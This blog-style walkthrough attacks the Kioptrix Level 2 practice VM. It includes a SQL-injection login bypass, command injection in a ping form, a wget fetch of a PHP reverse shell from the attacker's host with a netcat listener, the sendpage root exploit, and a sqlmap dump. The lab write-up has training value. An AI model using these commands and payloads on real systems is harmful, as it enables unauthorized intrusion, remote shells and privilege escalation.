Pentest lab - Kioptrix Level 2 - Core dump overflow

Today I will walk through exploiting level 2 in the Kioptrix series.

Again, I first did a ping sweep with Nmap and determined the IP of the target is 192.168.127.162

Next, the port scan:

nmap -A -p1-65535 192.168.127.162

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-16 22:52 EEST
Nmap scan report for 192.168.127.162
Host is up (0.00036s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            630/udp  status
|_  100024  1            633/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-07T23:10:47+00:00
|_Not valid after:  2010-10-07T23:10:47+00:00
|_ssl-date: 2014-06-16T16:42:47+00:00; -3h09m46s from local time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: 403 Forbidden
633/tcp  open  status   1 (RPC #100024)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            630/udp  status
|_  100024  1            633/tcp  status
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:20:9D:3E (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30

From web to shell

Pointing the browser to the target, we can see this remote admin login panel:

Immediately thinking SQL injection, I did a quick scan with Owasp Zap and indeed, the login can be bypassed using an injection like the following:

‘ or '1’ = ‘1’ —

Now we can see an interface where we can ping hosts, which might mean remote code execution:

ping

After testing the ping functionality, I ran a quick uname -a to confirm that remote code execution is possible:

; uname -a

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux

The semicolon is used to run multiple commands, so in this case I am closing the ping command and inputting another one after it. I tried poking around, checking if I can read /etc/shadow (which I can’t, only /etc/passwd). The commands are ran by the apache user. So I’m thinking, it’s time for some PHP backdoor fun! I found some on Kali in /usr/share/webshells/php

First, I’m going to copy the reverse PHP shell to my home directory and rename it:

cp php-reverse-shell.php ~/shell.php

Let’s see the description:

This script will make an outbound TCP connection to a hardcoded IP and port. The recipient will be given a shell running as the current user (apache normally).

Next I looked at the Php code, and I need to change the IP and port. The IP is the address of the attacker machine, and for the port I just threw 80 in there, since an outbound connection to port 80 is guaranteed to be allowed (if there was a firewall in place).

With that done, the next step is to serve the shell on my machine and use the web interface to download it to the target host.

On my machine:

nc -v -l -p 80 < shell.php

On the web interface:

; wget 192.168.127.159:80 -O /tmp/puppies.php 

; ls /tmp

puppies.php

Now listen on my machine for the incoming connection:

nc -v -l -p 80 

And on the web interface, execute the shell:

; php /tmp/puppies.php

And we have a shell!

nc: connect to 192.168.127.159 80 from 192.168.127.162 (192.168.127.162) 32772 [32772]
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
 13:15:37 up  2:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell

It’s time for privilege escalation! I will use the sendpage exploit:

cp /usr/share/exploitdb/platforms/linux/local/9545.c ~/sendpage.c
nc -vv -l -p 5555 < sendpage.c

And from the shell:

sh-3.00# wget 192.168.127.159 -O /tmp/sendpage.c
sh-3.00# cd /tmp
sh-3.00# gcc -o sendpage sendpage.c
sh-3.00# chmod a+x sendpage
sh-3.00# ./sendpage
sh: no job control in this shell
sh-3.00# whoami
root

Breaking into the database

I will now explore a different attack vector, by using sqlmap to dump the juicy stuff of the database.

sqlmap -u "http://192.168.127.162/index.php" --dbms=MySQL --dump --data "uname=test&psw=pass" --level=5 --risk=3
Database: webapp
Table: users
[2 entries]
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
| 1  | admin    | 5afac8d85f |
| 2  | john     | 66lajGGbla |
+----+----------+------------+

I couldn’t connect to the MySQL database though, so didn’t find a use for these credentials.

I also tried an exploit against the CUPS daemon, to no avail. So I guess this is it for level 2.

You have an unusual magnetic personality. Don’t walk too close to metal objects which are not fastened down.

Core dump overflow

Core dump in progress...

Pentest lab - Kioptrix Level 2

From web to shell

Breaking into the database

Comments